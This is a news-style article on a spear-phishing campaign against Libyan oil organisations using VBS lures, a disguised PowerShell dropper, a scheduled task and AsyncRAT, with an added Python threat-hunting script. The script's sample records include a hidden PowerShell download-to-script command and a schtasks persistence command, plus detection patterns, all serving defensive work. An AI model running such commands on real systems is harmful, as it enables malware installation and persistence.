Espionage in the Oil Fields: Inside the Shadowy Cyber Campaign Targeting Libya’s Lifeblood
A sophisticated cyber plot uses political chaos and public malware to spy on Libya’s vital oil sector.
It began with a chilling subject line: “Leaked CCTV footage – Saif al-Gaddafi’s assassination.gz.” For Libyan employees at a national oil refinery, the email seemed urgent and credible. But behind the lure was a meticulously crafted cyber espionage operation - one that would quietly infiltrate critical infrastructure at a time when the world’s energy markets were already on edge.
Inside the Attack: How Hackers Exploited Chaos
Between late 2025 and early 2026, a series of targeted cyberattacks swept through key Libyan organizations. The attackers’ focus was clear: compromise entities central to Libya’s oil production, a sector critical not only to the nation but to the global energy supply chain. With output peaking at 1.37 million barrels per day, Libya’s oil has never been more vital - or more vulnerable.
The operation started with customized spear-phishing emails, cleverly referencing current events to lure victims. One especially potent bait: a document purporting to show leaked footage of Saif al-Gaddafi’s assassination - a real and recent event. These emails carried malicious Visual Basic Script (VBS) files with names like “video_saif_gadafi_2026.vbs,” downloaded from public file-sharing sites. Once executed, these scripts triggered a stealthy infection chain.
The VBS downloader fetched a PowerShell dropper disguised as an image. This dropper created a Windows scheduled task - named “devil” - that would persistently launch the final payload: AsyncRAT. This open-source remote access tool is a hacker’s Swiss Army knife, capable of logging keystrokes, stealing credentials, capturing screens, and executing commands. Its flexibility and public availability make it a favorite for both cybercriminals and state-linked groups.
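The chain just described (a script attachment posing as media, a script host spawning PowerShell that fetches an image-named file, and a scheduled task launching a payload from a user-writable path) maps onto a handful of hunting checks. The block below is an added example, not code from the article or from the investigators it cites. The log records are constructed and loosely modelled on Sysmon process-creation and Windows task-creation events; the field names, host names, file paths, and the `example.invalid` URL are assumptions to adapt to a real SIEM schema. Only the task name "devil" and the "video_saif_gadafi_2026.vbs" file name come from the article.

```python
"""Hunting heuristics for a VBS -> PowerShell -> scheduled task -> RAT chain.
Added example; log records are constructed and field names are assumptions."""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Extensions a lure tends to imitate (archive or media) in a script's base name.
LURE_EXTS = (".gz", ".zip", ".rar", ".mp4", ".avi", ".jpg", ".png", ".pdf")
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta")
USER_WRITABLE = re.compile(r"\\(appdata|temp|tmp|downloads|public)\\", re.IGNORECASE)
IMAGE_URL = re.compile(r"https?://\S+?\.(?:jpe?g|png|gif|bmp)(?=[\s'\"]|$)", re.IGNORECASE)
KNOWN_TASK_NAMES = {"devil"}  # scheduled-task name reported in the article


def classify_attachment(name: str) -> list[str]:
    """Reasons a mail attachment name looks like a script lure (empty if none)."""
    reasons = []
    lower = name.lower()
    if lower.endswith(SCRIPT_EXTS):
        reasons.append("executable script attachment")
        stem = lower.rsplit(".", 1)[0]
        if stem.endswith(LURE_EXTS) or re.search(r"video|footage|cctv|leak", stem):
            reasons.append("script disguised as media or archive")
    return reasons


def classify_process(ev: dict) -> list[str]:
    """Reasons a process-creation record matches the downloader/dropper stage."""
    reasons = []
    parent = ev.get("parent_image", "").lower().rsplit("\\", 1)[-1]
    image = ev.get("image", "").lower().rsplit("\\", 1)[-1]
    cmd = ev.get("command_line", "")
    if parent in SCRIPT_HOSTS and image in SHELLS:
        reasons.append(f"{parent} spawned {image}")
    if image in {"powershell.exe", "pwsh.exe"} and IMAGE_URL.search(cmd):
        reasons.append("powershell fetching an image-named URL (possible disguised dropper)")
    if image == "schtasks.exe" and "/create" in cmd.lower() and parent in SHELLS | SCRIPT_HOSTS:
        reasons.append("scheduled task created from a script host or shell")
    return reasons


def classify_task(ev: dict) -> list[str]:
    """Reasons a task-creation record matches the persistence stage."""
    reasons = []
    name = ev.get("task_name", "").strip("\\").lower()
    action = ev.get("action", "")
    if name in KNOWN_TASK_NAMES:
        reasons.append(f"task name '{name}' matches reported indicator")
    if USER_WRITABLE.search(action):
        reasons.append("task action runs from a user-writable path")
    if re.search(r"powershell|wscript|cscript", action, re.IGNORECASE):
        reasons.append("task action invokes a script host or shell")
    return reasons


CLASSIFIERS = {
    "attachment": lambda ev: classify_attachment(ev["name"]),
    "process": classify_process,
    "task": classify_task,
}


def hunt(events: list[dict]) -> list[tuple[str, str, list[str]]]:
    """Run every record through the classifier for its kind; keep the hits."""
    findings = []
    for ev in events:
        reasons = CLASSIFIERS[ev["kind"]](ev)
        if reasons:
            findings.append((ev["kind"], ev.get("host", "?"), reasons))
    return findings


# Constructed sample records (hosts, paths and URL are made up for the example).
SAMPLE_EVENTS = [
    {"kind": "attachment", "host": "mailgw", "name": "video_saif_gadafi_2026.vbs"},
    {"kind": "attachment", "host": "mailgw", "name": "quarterly_report.pdf"},
    {"kind": "process", "host": "ws01",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -c \"Invoke-WebRequest "
                     "http://cdn.example.invalid/photo.jpg -OutFile $env:TEMP\\p.ps1\""},
    {"kind": "process", "host": "ws02",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"kind": "process", "host": "ws01",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "command_line": r'schtasks.exe /Create /SC MINUTE /MO 5 /TN devil /TR "C:\Users\a\AppData\Roaming\svc.exe"'},
    {"kind": "task", "host": "ws01", "task_name": "\\devil",
     "action": r"C:\Users\a\AppData\Roaming\svc.exe"},
    {"kind": "task", "host": "ws02", "task_name": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "action": r"%windir%\system32\defrag.exe -c -h -k -g"},
]

if __name__ == "__main__":
    for kind, host, reasons in hunt(SAMPLE_EVENTS):
        print(f"[{host}] {kind}: " + "; ".join(reasons))
```

The checks are deliberately behavioural (script host spawning a shell, shell fetching an image-named URL, task action in AppData or Temp) so they keep firing when the task name or file names change; the literal "devil" match is the only indicator-based rule, and it is the one most likely to go stale.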
Investigators found evidence of attackers maintaining access for months, with activity logged in multiple bursts. The campaign’s persistence points to a methodical, intelligence-driven motive. Notably, samples of the malware - often named after Libyan themes - were uploaded to VirusTotal as early as April 2025, indicating long-term planning and broad targeting.
Global Ripples and Unanswered Questions
While AsyncRAT is used by everyone from lone hackers to nation-state operatives, the campaign’s sophistication and timing suggest possible state involvement - though conclusive attribution remains elusive. With the Gulf region’s tensions threatening global oil flows, intelligence on alternative producers like Libya is increasingly valuable. Security experts warn that cyber espionage is now a frontline tactic in geopolitical maneuvering, and no sector is immune.
For now, the Libyan campaign is a stark reminder: in times of political turmoil, cyber attackers move fast to exploit chaos, targeting the world’s most vital industries while the world looks elsewhere.
WIKICROOK
- Spear phishing: Spear phishing is a targeted cyberattack using personalized emails to trick specific individuals or organizations into revealing sensitive information.
- Remote Access Trojan (RAT): A Remote Access Trojan (RAT) is malware that lets attackers secretly control a victim’s computer from anywhere, enabling theft and spying.
- Persistence: Persistence involves techniques used by malware to survive reboots and stay hidden on systems, often by mimicking legitimate processes or updates.
- Dropper: A dropper is a type of malware that secretly installs additional malicious programs on an infected device, helping attackers bypass security measures.
- Credential theft: Credential theft occurs when hackers steal usernames and passwords, often via phishing or data breaches, to illegally access online accounts.